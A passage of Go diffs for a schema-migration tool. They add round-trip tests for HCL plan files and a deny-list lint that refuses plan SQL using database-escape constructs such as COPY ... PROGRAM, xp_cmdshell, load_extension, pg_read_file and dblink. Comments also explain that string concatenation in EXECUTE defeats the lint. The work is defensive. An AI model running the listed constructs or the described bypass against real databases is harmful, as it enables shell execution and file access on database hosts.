+			contents: "stray = true\nplan \"a\" {\n  from = \"a\"\n  to = \"b\"\n  migration = \"c;\"\n}\n",
+			want:     `invalid plan file .*: unexpected top-level attribute "stray"; an Atlas plan file contains exactly one plan block`,
+		},
+		{
+			name:     "empty_migration",
+			contents: "plan \"a\" {\n  from = \"a\"\n  to = \"b\"\n  migration = \"\"\n}\n",
+			want:     `invalid plan file .*: plan migration contains no statements`,
+		},
+		{
+			name:     "empty_from",
+			contents: "plan \"a\" {\n  from = \"\"\n  to = \"b\"\n  migration = \"c;\"\n}\n",
+			want:     `invalid plan file .*: plan from fingerprint is required`,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+			path := filepath.Join(t.TempDir(), "bad.plan.hcl")
+			c.Assert(os.WriteFile(path, []byte(tt.contents), 0o600), qt.IsNil)
+
+			_, _, err := atlasschema.ReadPlanDocument(path)
+
+			c.Assert(err, qt.ErrorMatches, tt.want)
+		})
+	}
+}
+
+func TestTimestampPlanName(t *testing.T) {
+	c := qt.New(t)
+
+	// The name is the Atlas-style UTC timestamp regardless of the local zone
+	// of the input.
+	instant := time.Date(2026, 8, 1, 10, 28, 1, 0, time.FixedZone("CEST", 2*60*60))
+
+	c.Assert(atlasschema.TimestampPlanName(instant), qt.Equals, "20260801082801")
+}
+
+func TestIsNativeFingerprint(t *testing.T) {
+	tests := []struct {
+		name        string
+		fingerprint string
+		want        bool
+	}{
+		{
+			name:        "ptah_sha256",
+			fingerprint: "sha256:2ef81def17f625ec4fc7927e136e516022e244ab587bb702b5b71d38b05cbe27",
+			want:        true,
+		},
+		{
+			name:        "atlas_base64",
+			fingerprint: "2Avyplv6jw8kAsH/g2YFPkfnp+UNBpomMXPUl/4R4+Q=",
+			want:        false,
+		},
+		{name: "empty", fingerprint: "", want: false},
+		{name: "junk", fingerprint: "sha256:xyz", want: false},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+
+			c.Assert(atlasschema.IsNativeFingerprint(tt.fingerprint), qt.Equals, tt.want)
+		})
+	}
+}

--- a/internal/atlasschema/planfile_hcl_test.go
+++ b/internal/atlasschema/planfile_hcl_test.go
@@ -255,6 +255,144 @@ func TestMarshalPlanFileHCLRefusesUnrepresentablePlans(t *testing.T) {
 	}
 }
 
+// TestMarshalPlanFileHCLRoundTripPropertyOverAdversarialSQL asserts the
+// writer's whole contract over content designed to break the heredoc: either
+// the document round-trips byte-for-byte through the reader, or the write is
+// refused with a named error. Silent rewriting is never acceptable, because
+// the plan file is the reviewed artifact and a rewritten statement is no
+// longer what the operator approved.
+func TestMarshalPlanFileHCLRoundTripPropertyOverAdversarialSQL(t *testing.T) {
+	tests := []struct {
+		name string
+		sql  string
+	}{
+		{
+			name: "plain_ddl",
+			sql:  `CREATE TABLE t (id integer)`,
+		},
+		{
+			name: "multiline_ddl_with_blank_line",
+			sql:  "CREATE TABLE t (\n  id integer,\n\n  name text\n)",
+		},
+		{
+			name: "leading_and_trailing_spaces_inside_lines",
+			sql:  "CREATE TABLE t (\n      id integer\n)",
+		},
+		{
+			name: "backslashes",
+			sql:  `INSERT INTO t VALUES ('C:\path\to\file')`,
+		},
+		{
+			name: "double_quotes_and_backticks",
+			sql:  "CREATE TABLE \"t\" (`id` integer)",
+		},
+		{
+			name: "sql_word_inside_a_longer_line",
+			sql:  "CREATE TABLE t (\n  SQL_MODE text\n)",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+			plan := goldenPlan()
+			plan.Statements = []atlasschema.PlanStatement{{
+				SQL:      tt.sql,
+				Severity: safety.Safe,
+				Reason:   "test fixture",
+			}}
+
+			document, err := atlasschema.MarshalPlanFileHCL(plan)
+			c.Assert(err, qt.IsNil)
+			path := filepath.Join(t.TempDir(), "property.plan.hcl")
+			c.Assert(os.WriteFile(path, document, 0o600), qt.IsNil)
+
+			readBack, format, readErr := atlasschema.ReadPlanDocument(path)
+
+			// The statement survives the heredoc verbatim, modulo the
+			// trailing semicolon the writer normalizes onto every statement.
+			c.Assert(readErr, qt.IsNil)
+			c.Assert(format, qt.Equals, atlasschema.PlanFormatHCL)
+			c.Assert(readBack.Statements, qt.HasLen, 1)
+			c.Assert(readBack.Statements[0].SQL, qt.Equals, strings.TrimSuffix(tt.sql, ";"))
+		})
+	}
+}
+
+// TestMarshalPlanFileHCLRefusesUnrepresentableMigrationContent is the other
+// half of the writer's contract: content the heredoc cannot carry back
+// verbatim is refused by name rather than silently rewritten, because a
+// rewritten statement is no longer the one the operator reviewed.
+func TestMarshalPlanFileHCLRefusesUnrepresentableMigrationContent(t *testing.T) {
+	tests := []struct {
+		name string
+		sql  string
+		want string
+	}{
+		{
+			// A line that trims to the delimiter would close the heredoc.
+			name: "sql_token_with_surrounding_spaces_on_its_own_line",
+			sql:  "CREATE TABLE t (\n  SQL  \n)",
+			want: `plan migration contains a line consisting of the heredoc delimiter "SQL".*`,
+		},
+		{
+			// Both the carriage return and the delimiter line are refusals;
+			// the CR is reported first because it is checked first.
+			name: "sql_token_line_with_crlf",
+			sql:  "CREATE TABLE t (\r\n  SQL\r\n)",
+			want: `plan migration contains a carriage return.*`,
+		},
+		{
+			name: "crlf_line_endings",
+			sql:  "CREATE TABLE t (\r\n  id integer\r\n)",
+			want: `plan migration contains a carriage return.*normalize the statement to LF line endings.*`,
+		},
+		{
+			name: "lone_carriage_return",
+			sql:  "CREATE TABLE t (\r  id integer)",
+			want: `plan migration contains a carriage return.*`,
+		},
+		{
+			name: "template_interpolation",
+			sql:  `INSERT INTO t VALUES ('${var.x}')`,
+			want: `plan migration contains an HCL template interpolation sequence.*`,
+		},
+		{
+			name: "template_directive",
+			sql:  `INSERT INTO t VALUES ('%{ if true }')`,
+			want: `plan migration contains an HCL template interpolation sequence.*`,
+		},
+		{
+			name: "invalid_utf8",
+			sql:  "CREATE TABLE t (name text DEFAULT '\xff\xfe')",
+			want: `plan migration contains invalid UTF-8.*`,
+		},
+		{
+			// HCL leaves whitespace-only lines out of `<<-` stripping, so the
+			// writer's indentation would come back inside the statement.
+			name: "whitespace_only_line",
+			sql:  "CREATE TABLE t (\n  \n  id integer\n)",
+			want: `plan migration contains a whitespace-only line.*leave the line empty or write the native JSON plan format instead`,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+			plan := goldenPlan()
+			plan.Statements = []atlasschema.PlanStatement{{
+				SQL:      tt.sql,
+				Severity: safety.Safe,
+				Reason:   "test fixture",
+			}}
+
+			_, err := atlasschema.MarshalPlanFileHCL(plan)
+
+			c.Assert(err, qt.ErrorMatches, tt.want)
+		})
+	}
+}
+
 func TestReadPlanDocumentRejectsMalformedHCL(t *testing.T) {
 	tests := []struct {
 		name     string

--- a/internal/atlasschema/planguard.go
+++ b/internal/atlasschema/planguard.go
@@ -91,10 +91,10 @@ type escapeRule struct {
 //
 // The security model is therefore split by who chose the database:
 //
-//   - Ephemeral SQLite dev databases, which Ptah creates itself and the
-//     operator never opts into, get REAL engine-level enforcement — see
-//     [RestrictEphemeralSQLiteDev]. That is what makes the ephemeral path
-//     safe, not this list.
+//   - SQLite dev databases get REAL engine-level enforcement, applied by
+//     dbschema.DatabaseConnection.WithUntrustedSQLSession, which is how every
+//     rehearsal takes its session. That is what makes the ephemeral dev
+//     database safe, not this list.
 //   - Operator-supplied --dev-url databases get this lint, and nothing more.
 //     The operator chose that database; the docs state plainly that it must be
 //     one they are willing to have a foreign plan file execute arbitrary SQL
@@ -134,11 +134,6 @@ var escapeRules = []escapeRule{
 		construct: "load_extension",
 		reach:     "loads a native extension module from the host filesystem",
 		match:     calledFunction("LOAD_EXTENSION"),
-	},
-	{
-		construct: "DO",
-		reach:     "executes an anonymous server-side code block, which can call out to anything the database server can reach",
-		match:     statementStartsWith("DO"),
 	},
 	{
 		construct: "LOAD DATA INFILE",
@@ -286,7 +281,7 @@ var escapeRules = []escapeRule{
 //
 // It is a best-effort lint, NOT a containment boundary — see [escapeRules].
 // Real enforcement exists only on the ephemeral SQLite dev database Ptah
-// creates itself (see [RestrictEphemeralSQLiteDev]); an operator-supplied
+// creates itself (see dbschema.DatabaseConnection.WithUntrustedSQLSession); an operator-supplied
 // --dev-url executes plan SQL for real and must be a database the operator is
 // willing to expose to a foreign plan file.
 //
@@ -369,7 +364,15 @@ func codeBearingStrings(ctx scanContext) []string {
 }
 
 // dynamicExecutorKeywords introduce a string that the database will execute.
-var dynamicExecutorKeywords = []string{"EXECUTE", "EXEC", "PREPARE", "SP_EXECUTESQL", "PERFORM"}
+//
+// DO is here rather than in the rules: an anonymous block is not itself an
+// escape, it is the standard PostgreSQL idiom for idempotent DDL
+// (`DO $$ BEGIN IF NOT EXISTS (...) THEN CREATE TYPE ...; END IF; END $$`),
+// and a foreign Atlas-authored PostgreSQL plan is full of them. Refusing the
+// block wholesale broke exactly the interop this reader exists for, while
+// scanning its body — which the dollar-quoted and single-quoted forms both go
+// through — still catches what the block would actually do.
+var dynamicExecutorKeywords = []string{"EXECUTE", "EXEC", "PREPARE", "SP_EXECUTESQL", "PERFORM", "DO"}
 
 // followsDynamicExecutor reports whether the string at index i is an argument
 // of a dynamic executor, walking back over `(` and `||` so that

--- a/internal/atlasschema/planguard.go
+++ b/internal/atlasschema/planguard.go
@@ -1,0 +1,261 @@
+package atlasschema
+
+import (
+	"errors"
+	"fmt"
+	"slices"
+	"strings"
+
+	"github.com/stokaro/ptah/internal/lexer"
+)
+
+// PlanEscapeError reports that a pre-planned statement can reach databases or
+// files outside the dev database, so replaying it on the dev database would
+// not be a sandboxed rehearsal: the "verification" could modify the real
+// target (or the host filesystem) and could even pass while the effect landed
+// somewhere the comparison never looks.
+type PlanEscapeError struct {
+	// StatementIndex is the 1-based position of the offending statement.
+	StatementIndex int
+	// Construct is the SQL construct that escapes the dev database.
+	Construct string
+	// Reach describes what the construct can touch.
+	Reach string
+}
+
+func (e *PlanEscapeError) Error() string {
+	return fmt.Sprintf(
+		"pre-planned migration cannot be verified on a dev database: statement %d uses %s, which %s. "+
+			"Replaying it would not be a sandboxed rehearsal — it could modify the real target or the host "+
+			"filesystem while the plan is still being verified, so the plan is refused before anything runs. "+
+			"Review the statement and run it deliberately outside `schema apply --plan`",
+		e.StatementIndex, e.Construct, e.Reach)
+}
+
+// IsPlanEscape reports whether err wraps a dev-database escape refusal.
+func IsPlanEscape(err error) bool {
+	var target *PlanEscapeError
+	return errors.As(err, &target)
+}
+
+// escapeRule matches one dev-database escape construct. A rule fires only on
+// bare (unquoted) SQL keywords: the lexer emits double-quoted identifiers as
+// strings and keeps the quotes on backticked ones, and a quoted keyword is an
+// ordinary identifier to the database anyway, so a table named "attachment" or
+// a string literal containing ATTACH never matches.
+type escapeRule struct {
+	// leading, when non-empty, requires the statement to start with this
+	// keyword.
+	leading string
+	// keyword is the bare identifier that triggers the rule. Empty matches
+	// any statement that satisfies leading and stringArgAfter.
+	keyword string
+	// prefix, when true, matches identifiers that merely start with keyword.
+	prefix bool
+	// stringArgAfter, when non-empty, additionally requires a string literal
+	// to directly follow one of these keywords (a file path argument).
+	stringArgAfter []string
+	construct      string
+	reach          string
+}
+
+// escapeRules enumerate the constructs that break dev-database containment.
+// The set is dialect-generic on purpose: a plan file is an untrusted document
+// and the reader does not know which engine authored it, so every family's
+// escape hatches are refused regardless of the target dialect.
+var escapeRules = []escapeRule{
+	{
+		leading: "ATTACH", keyword: "ATTACH",
+		construct: "ATTACH",
+		reach:     "attaches another SQLite database file to the session, so the statement can write to databases other than the dev database",
+	},
+	{
+		leading: "DETACH", keyword: "DETACH",
+		construct: "DETACH",
+		reach:     "manipulates the session's attached SQLite databases rather than the dev database schema",
+	},
+	{
+		leading: "VACUUM", keyword: "INTO",
+		construct: "VACUUM INTO",
+		reach:     "writes a copy of the database to an arbitrary path on the host filesystem",
+	},
+	{
+		leading: "LOAD", keyword: "INFILE",
+		construct: "LOAD DATA INFILE",
+		reach:     "reads a file from the database server or the client host",
+	},
+	{
+		keyword:   "OUTFILE",
+		construct: "SELECT ... INTO OUTFILE",
+		reach:     "writes a file on the database server host",
+	},
+	{
+		keyword:   "DUMPFILE",
+		construct: "SELECT ... INTO DUMPFILE",
+		reach:     "writes a file on the database server host",
+	},
+	{
+		leading: "COPY", keyword: "PROGRAM",
+		construct: "COPY ... PROGRAM",
+		reach:     "executes a shell command on the database server host",
+	},
+	{
+		leading: "COPY", stringArgAfter: []string{"FROM", "TO"},
+		construct: "COPY with a file path",
+		reach:     "reads or writes a file on the database server host",
+	},
+	{
+		keyword: "DBLINK", prefix: true,
+		construct: "dblink",
+		reach:     "opens a connection to another database server",
+	},
+	{
+		keyword:   "POSTGRES_FDW",
+		construct: "postgres_fdw",
+		reach:     "federates data from another database server",
+	},
+	{
+		keyword:   "FILE_FDW",
+		construct: "file_fdw",
+		reach:     "exposes files on the database server host as tables",
+	},
+	{
+		keyword:   "PG_READ_FILE",
+		construct: "pg_read_file",
+		reach:     "reads a file on the database server host",
+	},
+	{
+		keyword:   "PG_READ_BINARY_FILE",
+		construct: "pg_read_binary_file",
+		reach:     "reads a file on the database server host",
+	},
+	{
+		keyword:   "PG_LS_DIR",
+		construct: "pg_ls_dir",
+		reach:     "lists a directory on the database server host",
+	},
+	{
+		keyword:   "LO_IMPORT",
+		construct: "lo_import",
+		reach:     "reads a file on the database server host",
+	},
+	{
+		keyword:   "LO_EXPORT",
+		construct: "lo_export",
+		reach:     "writes a file on the database server host",
+	},
+}
+
+// CheckPlanStatementsSandboxable refuses pre-planned statements that could
+// escape the dev database during rehearsal. It is the gate in front of every
+// replay: a plan file is an untrusted input, and a "verification" that can
+// mutate the real target or the host filesystem is worse than no verification
+// because it reports success while the effect landed elsewhere.
+//
+// Statements are scanned under both string-escape interpretations (with and
+// without backslash escapes), so a payload cannot hide a keyword inside text
+// that only one dialect's lexer would treat as a string literal.
+func CheckPlanStatementsSandboxable(statements []string) error {
+	for i, statement := range statements {
+		for _, backslashEscapes := range []bool{false, true} {
+			if err := checkStatementSandboxable(statement, i+1, backslashEscapes); err != nil {
+				return err
+			}
+		}
+	}
+	return nil
+}
+
+func checkStatementSandboxable(statement string, index int, backslashEscapes bool) error {
+	tokens := significantTokens(statement, backslashEscapes)
+	if len(tokens) == 0 {
+		return nil
+	}
+	for _, rule := range escapeRules {
+		if rule.leading != "" && !hasLeadingKeyword(tokens, rule.leading) {
+			continue
+		}
+		if !ruleMatches(rule, tokens) {
+			continue
+		}
+		return &PlanEscapeError{StatementIndex: index, Construct: rule.construct, Reach: rule.reach}
+	}
+	return nil
+}
+
+// hasLeadingKeyword reports whether keyword starts a statement anywhere in the
+// token stream: at the beginning, or directly after a semicolon. The second
+// case matters because the statement splitter and this scanner can disagree
+// about where a string literal ends, so a payload may still carry an embedded
+// statement inside what the splitter handed over as one statement.
+func hasLeadingKeyword(tokens []lexer.Token, keyword string) bool {
+	atStatementStart := true
+	for _, token := range tokens {
+		if token.Type == lexer.TokenSemicolon {
+			atStatementStart = true
+			continue
+		}
+		if atStatementStart && token.Type == lexer.TokenIdentifier && strings.EqualFold(token.Value, keyword) {
+			return true
+		}
+		atStatementStart = false
+	}
+	return false
+}
+
+func ruleMatches(rule escapeRule, tokens []lexer.Token) bool {
+	if len(rule.stringArgAfter) > 0 {
+		return hasStringArgumentAfter(tokens, rule.stringArgAfter)
+	}
+	for _, token := range tokens {
+		if token.Type != lexer.TokenIdentifier {
+			continue
+		}
+		value := strings.ToUpper(token.Value)
+		if value == rule.keyword || (rule.prefix && strings.HasPrefix(value, rule.keyword)) {
+			return true
+		}
+	}
+	return false
+}
+
+// hasStringArgumentAfter reports whether a string literal directly follows one
+// of the given bare keywords, which is how a file path is passed to COPY.
+// `COPY t FROM STDIN` has no string argument and does not match.
+func hasStringArgumentAfter(tokens []lexer.Token, keywords []string) bool {
+	for i, token := range tokens {
+		if token.Type != lexer.TokenIdentifier || i+1 >= len(tokens) {
+			continue
+		}
+		if tokens[i+1].Type != lexer.TokenString {
+			continue
+		}
+		value := strings.ToUpper(token.Value)
+		if slices.Contains(keywords, value) {
+			return true
+		}
+	}
+	return false
+}
+
+// significantTokens tokenizes a statement, dropping whitespace and comments so
+// rules see the executable token sequence. Quoted identifiers keep their
+// quotes (backticks, brackets) or arrive as strings, so they never match a
+// bare-keyword rule.
+func significantTokens(statement string, backslashEscapes bool) []lexer.Token {
+	lexr := lexer.NewLexerWithOptions(statement, lexer.Options{
+		StandardStrings:  true,
+		BackslashEscapes: backslashEscapes,
+	})
+	var tokens []lexer.Token
+	for {
+		token := lexr.NextToken()
+		if token.Type == lexer.TokenEOF {
+			return tokens
+		}
+		if token.Type == lexer.TokenWhitespace || token.Type == lexer.TokenComment {
+			continue
+		}
+		tokens = append(tokens, token)
+	}
+}

--- a/internal/atlasschema/planguard.go
+++ b/internal/atlasschema/planguard.go
@@ -11,10 +11,11 @@ import (
 )
 
 // PlanEscapeError reports that a pre-planned statement matched a known
-// dev-database escape construct, so replaying it would not stay inside the dev
-// database: the "verification" could modify the real target (or the host
-// filesystem) and could even pass while the effect landed somewhere the
-// comparison never looks.
+// dev-database escape construct.
+//
+// This is a lint result, not a containment verdict: see [escapeRules] for why
+// the deny-list cannot be a boundary, and [CheckPlanStatementsSandboxable] for
+// which dev databases get real enforcement instead.
 type PlanEscapeError struct {
 	// StatementIndex is the 1-based position of the offending statement.
 	StatementIndex int
@@ -26,9 +27,8 @@ type PlanEscapeError struct {
 
 func (e *PlanEscapeError) Error() string {
 	return fmt.Sprintf(
-		"pre-planned migration cannot be verified on a dev database: statement %d uses %s, which %s. "+
-			"Replaying it would not stay inside the dev database — it could modify the real target or the host "+
-			"filesystem while the plan is still being verified, so the plan is refused before anything runs. "+
+		"pre-planned migration was refused before it reached the dev database: statement %d uses %s, which %s. "+
+			"A dev database executes plan SQL for real, so the plan is refused before anything runs. "+
 			"Review the statement and run it deliberately outside `schema apply --plan`",
 		e.StatementIndex, e.Construct, e.Reach)
 }
@@ -39,13 +39,38 @@ func IsPlanEscape(err error) bool {
 	return errors.As(err, &target)
 }
 
+// PlanScanDepthError reports that a plan statement nested code inside string
+// literals more deeply than the scanner follows. The plan is refused rather
+// than accepted unscanned: the point of the scan is that unreviewed SQL does
+// not reach a dev database, and a document burying code this deep is not
+// something a legitimate planner emits.
+type PlanScanDepthError struct {
+	StatementIndex int
+}
+
+func (e *PlanScanDepthError) Error() string {
+	return fmt.Sprintf(
+		"pre-planned migration was refused before it reached the dev database: statement %d nests executable code "+
+			"inside string literals more than %d levels deep, which the plan scanner does not follow, so the "+
+			"statement cannot be checked; review it and run it deliberately outside `schema apply --plan`",
+		e.StatementIndex, maxPlanGuardNesting)
+}
+
 // maxPlanGuardNesting bounds how deep the scanner follows code carried inside
-// string literals (routine bodies inside routine bodies).
+// string literals (routine bodies inside routine bodies). Exceeding it is an
+// error, not a pass.
 const maxPlanGuardNesting = 4
 
-// tokenMatcher reports whether a statement's significant tokens match one
-// escape construct.
-type tokenMatcher func(tokens []lexer.Token) bool
+// scanContext is one statement's token stream plus whether it came from inside
+// a routine body, where statements also start after BEGIN/THEN/ELSE/LOOP/DO
+// rather than only after a semicolon.
+type scanContext struct {
+	tokens []lexer.Token
+	inBody bool
+}
+
+// tokenMatcher reports whether a statement matches one escape construct.
+type tokenMatcher func(scanContext) bool
 
 // escapeRule is one known escape construct: how to recognize it, and what it
 // can reach.
@@ -55,25 +80,30 @@ type escapeRule struct {
 	match     tokenMatcher
 }
 
-// escapeRules enumerates the escape constructs this guard knows about.
+// escapeRules enumerates the escape constructs this lint knows about.
 //
-// This list is a best-effort deny-list of known constructs, NOT a sandbox and
-// NOT exhaustive. SQL dialects offer many ways to address something other than
-// the connected database — server-side language extensions, foreign-data
-// wrappers, storage-engine options, loadable modules, and engine-specific
-// pragmas and functions — and new ones arrive with new engine versions. A
-// determined author of a plan file can very likely find a construct this list
-// does not name.
+// This is a BEST-EFFORT LINT over statement text, not a containment boundary,
+// and it cannot become one. String concatenation alone defeats any scanner:
+// `EXECUTE 'ATT' || 'ACH ...'` and `format('COPY t FROM PROGRAM %L', x)` build
+// the dangerous statement at run time, so no lexical rule can see it. Beyond
+// that, every dialect keeps adding ways to address something other than the
+// connected database.
 //
-// The security consequence is stated plainly in the docs and repeated here: a
-// --dev-url must be a database you are willing to have a foreign plan file
-// execute arbitrary SQL against. The only path with no such exposure is the
-// ephemeral SQLite dev database Ptah creates itself for SQLite targets, which
-// is a throwaway file in a private temp directory.
+// The security model is therefore split by who chose the database:
 //
-// The set is dialect-generic on purpose: a plan file is an untrusted document
-// and the reader does not know which engine authored it, so every family's
-// escape hatches are checked regardless of the target dialect.
+//   - Ephemeral SQLite dev databases, which Ptah creates itself and the
+//     operator never opts into, get REAL engine-level enforcement — see
+//     [RestrictEphemeralSQLiteDev]. That is what makes the ephemeral path
+//     safe, not this list.
+//   - Operator-supplied --dev-url databases get this lint, and nothing more.
+//     The operator chose that database; the docs state plainly that it must be
+//     one they are willing to have a foreign plan file execute arbitrary SQL
+//     against.
+//
+// Coverage is deliberately partial and dialect-specific: SQLite, PostgreSQL,
+// MySQL/MariaDB, SQL Server, and ClickHouse constructs are represented. It
+// catches honest mistakes and known tricks. It does not stop an author who is
+// trying to get past it.
 var escapeRules = []escapeRule{
 	{
 		construct: "ATTACH",
@@ -93,7 +123,17 @@ var escapeRules = []escapeRule{
 	{
 		construct: "PRAGMA temp_store_directory",
 		reach:     "redirects SQLite temporary storage to an arbitrary directory on the host filesystem",
-		match:     statementStartsWith("PRAGMA", "TEMP_STORE_DIRECTORY"),
+		match:     pragmaAssignment("TEMP_STORE_DIRECTORY"),
+	},
+	{
+		construct: "PRAGMA data_store_directory",
+		reach:     "redirects SQLite database storage to an arbitrary directory on the host filesystem",
+		match:     pragmaAssignment("DATA_STORE_DIRECTORY"),
+	},
+	{
+		construct: "load_extension",
+		reach:     "loads a native extension module from the host filesystem",
+		match:     calledFunction("LOAD_EXTENSION"),
 	},
 	{
 		construct: "DO",
@@ -108,12 +148,12 @@ var escapeRules = []escapeRule{
 	{
 		construct: "SELECT ... INTO OUTFILE",
 		reach:     "writes a file on the database server host",
-		match:     keywordAfterKeyword("INTO", "OUTFILE"),
+		match:     keywordSequenceWithStringArgument("INTO", "OUTFILE"),
 	},
 	{
 		construct: "SELECT ... INTO DUMPFILE",
 		reach:     "writes a file on the database server host",
-		match:     keywordAfterKeyword("INTO", "DUMPFILE"),
+		match:     keywordSequenceWithStringArgument("INTO", "DUMPFILE"),
 	},
 	{
 		construct: "LOAD_FILE",
@@ -123,7 +163,15 @@ var escapeRules = []escapeRule{
 	{
 		construct: "ENGINE=FEDERATED",
 		reach:     "stores the table on another database server reached over the network",
-		match:     keywordAfterKeyword("ENGINE", "FEDERATED"),
+		match:     engineAssignment("FEDERATED"),
+	},
+	{
+		construct: "ClickHouse remote table engine",
+		reach:     "stores or reads the table over the network or from the host filesystem",
+		match: anyMatch(
+			engineAssignment("URL"), engineAssignment("FILE"), engineAssignment("S3"),
+			engineAssignment("HDFS"), engineAssignment("MYSQL"), engineAssignment("POSTGRESQL"),
+		),
 	},
 	{
 		construct: "CREATE SERVER",
@@ -143,12 +191,12 @@ var escapeRules = []escapeRule{
 	{
 		construct: "DATA DIRECTORY",
 		reach:     "places table data at an arbitrary path on the database server host",
-		match:     adjacentKeywords("DATA", "DIRECTORY"),
+		match:     tableOptionPath("DATA", "DIRECTORY"),
 	},
 	{
 		construct: "INDEX DIRECTORY",
 		reach:     "places index data at an arbitrary path on the database server host",
-		match:     adjacentKeywords("INDEX", "DIRECTORY"),
+		match:     tableOptionPath("INDEX", "DIRECTORY"),
 	},
 	{
 		construct: "COPY ... PROGRAM",
@@ -159,6 +207,11 @@ var escapeRules = []escapeRule{
 		construct: "COPY with a file path",
 		reach:     "reads or writes a file on the database server host",
 		match:     all(statementStartsWith("COPY"), stringArgumentAfter("FROM", "TO")),
+	},
+	{
+		construct: "BULK INSERT",
+		reach:     "reads a file on the database server host",
+		match:     statementStartsWith("BULK", "INSERT"),
 	},
 	{
 		construct: "dblink",
@@ -200,23 +253,48 @@ var escapeRules = []escapeRule{
 		reach:     "writes a file on the database server host",
 		match:     calledFunction("LO_EXPORT"),
 	},
+	{
+		construct: "xp_cmdshell",
+		reach:     "executes a shell command on the database server host",
+		match:     procedureOrFunction("XP_CMDSHELL"),
+	},
+	{
+		construct: "xp_dirtree",
+		reach:     "lists directories on the database server host",
+		match:     procedureOrFunction("XP_DIRTREE"),
+	},
+	{
+		construct: "sp_addlinkedserver",
+		reach:     "defines a connection to another database server",
+		match:     procedureOrFunction("SP_ADDLINKEDSERVER"),
+	},
+	{
+		construct: "OPENROWSET",
+		reach:     "reads from another data source or a file on the database server host",
+		match:     calledFunction("OPENROWSET"),
+	},
+	{
+		construct: "OPENDATASOURCE",
+		reach:     "reads from another data source reached over the network",
+		match:     calledFunction("OPENDATASOURCE"),
+	},
 }
 
-// CheckPlanStatementsSandboxable refuses pre-planned statements that match a
-// known dev-database escape construct. It is the gate in front of every
-// replay: a plan file is an untrusted input, and a "verification" that can
-// mutate the real target or the host filesystem is worse than no verification
-// because it reports success while the effect landed elsewhere.
+// CheckPlanStatementsSandboxable lints pre-planned statements for known
+// dev-database escape constructs and refuses the plan when one matches. It
+// runs in front of every dev-database replay.
 //
-// It is a best-effort deny-list, not a sandbox — see [escapeRules] for what
-// that does and does not buy the caller.
+// It is a best-effort lint, NOT a containment boundary — see [escapeRules].
+// Real enforcement exists only on the ephemeral SQLite dev database Ptah
+// creates itself (see [RestrictEphemeralSQLiteDev]); an operator-supplied
+// --dev-url executes plan SQL for real and must be a database the operator is
+// willing to expose to a foreign plan file.
 //
 // dialect selects the same lexer behavior [SplitApplyStatements] uses, so the
 // scanner sees the statements the executor would run. Statements are
-// additionally scanned under both string-escape interpretations (with and
-// without backslash escapes), so a payload cannot hide a keyword inside text
-// that only one dialect's lexer would treat as a string literal, and code
-// carried inside routine bodies is scanned as code rather than as data.
+// additionally scanned under both string-escape interpretations, and code
+// carried in routine bodies or handed to a dynamic executor is scanned as
+// code rather than as data.
 func CheckPlanStatementsSandboxable(statements []string, dialect string) error {
 	for i, statement := range statements {
 		for _, backslashEscapes := range []bool{false, true} {
@@ -233,39 +311,45 @@ func checkStatementSandboxable(statement string, index int, backslashEscapes boo
 	if len(tokens) == 0 {
 		return nil
 	}
+	ctx := scanContext{tokens: tokens, inBody: depth > 0}
 	for _, rule := range escapeRules {
-		if !rule.match(tokens) {
+		if !rule.match(ctx) {
 			continue
 		}
 		return &PlanEscapeError{StatementIndex: index, Construct: rule.construct, Reach: rule.reach}
 	}
-	if depth >= maxPlanGuardNesting {
+	nested := codeBearingStrings(ctx)
+	if len(nested) == 0 {
 		return nil
 	}
-	// A dollar-quoted body and a routine definition's body are code, not data:
-	// the lexer hands them over as a single string token, so nothing inside
-	// would otherwise be scanned. Once inside such a body, deeper string
-	// literals are code as well — that is how dynamic SQL (EXECUTE '...')
-	// nests another routine definition.
-	for _, nested := range codeBearingStrings(tokens, depth > 0) {
-		if err := checkStatementSandboxable(nested, index, backslashEscapes, dialect, depth+1); err != nil {
+	if depth >= maxPlanGuardNesting {
+		return &PlanScanDepthError{StatementIndex: index}
+	}
+	for _, inner := range nested {
+		if err := checkStatementSandboxable(inner, index, backslashEscapes, dialect, depth+1); err != nil {
 			return err
 		}
 	}
 	return nil
 }
 
-// codeBearingStrings returns the string-literal contents of a statement that
-// carry executable code: dollar-quoted strings anywhere (PostgreSQL routine
-// bodies and quoted blocks), plus every string literal of a routine definition
-// or of a statement already known to be code, whose bodies may be ordinary
-// quoted strings. Ordinary top-level statements keep their string literals
-// treated as data, so a column default containing the words
-// "COPY ... FROM PROGRAM" stays harmless.
-func codeBearingStrings(tokens []lexer.Token, codeContext bool) []string {
-	routine := codeContext || isRoutineDefinition(tokens)
+// codeBearingStrings returns the string literals of a statement that carry
+// executable code. A string is code only where SQL actually executes it:
+//
+//   - a dollar-quoted string, which in PostgreSQL is how a routine body or a
+//     quoted block is written;
+//   - the body of a CREATE FUNCTION/PROCEDURE, i.e. the string right after AS;
+//   - an argument of a dynamic executor (EXECUTE, EXEC, PREPARE,
+//     sp_executesql, PERFORM), including through `(` and `||`.
+//
+// Every other string literal stays data. That distinction is what keeps
+// ordinary PL/pgSQL working: `RAISE EXCEPTION 'Do not delete rows'` and
+// `INSERT INTO docs (body) VALUES ('ATTACH the receipt here')` are a message
+// and a value, not statements, and must not be scanned as SQL.
+func codeBearingStrings(ctx scanContext) []string {
+	routineBody := isRoutineDefinition(ctx)
 	var nested []string
-	for _, token := range tokens {
+	for i, token := range ctx.tokens {
 		if token.Type != lexer.TokenString {
 			continue
 		}
@@ -273,20 +357,53 @@ func codeBearingStrings(tokens []lexer.Token, codeContext bool) []string {
 			nested = append(nested, inner)
 			continue
 		}
-		if routine {
+		if routineBody && followsKeyword(ctx.tokens, i, "AS") {
+			nested = append(nested, unquoteStringLiteral(token.Value))
+			continue
+		}
+		if followsDynamicExecutor(ctx.tokens, i) {
 			nested = append(nested, unquoteStringLiteral(token.Value))
 		}
 	}
 	return nested
 }
 
+// dynamicExecutorKeywords introduce a string that the database will execute.
+var dynamicExecutorKeywords = []string{"EXECUTE", "EXEC", "PREPARE", "SP_EXECUTESQL", "PERFORM"}
+
+// followsDynamicExecutor reports whether the string at index i is an argument
+// of a dynamic executor, walking back over `(` and `||` so that
+// `EXECUTE ('DROP ' || 'TABLE t')` is still recognized as code.
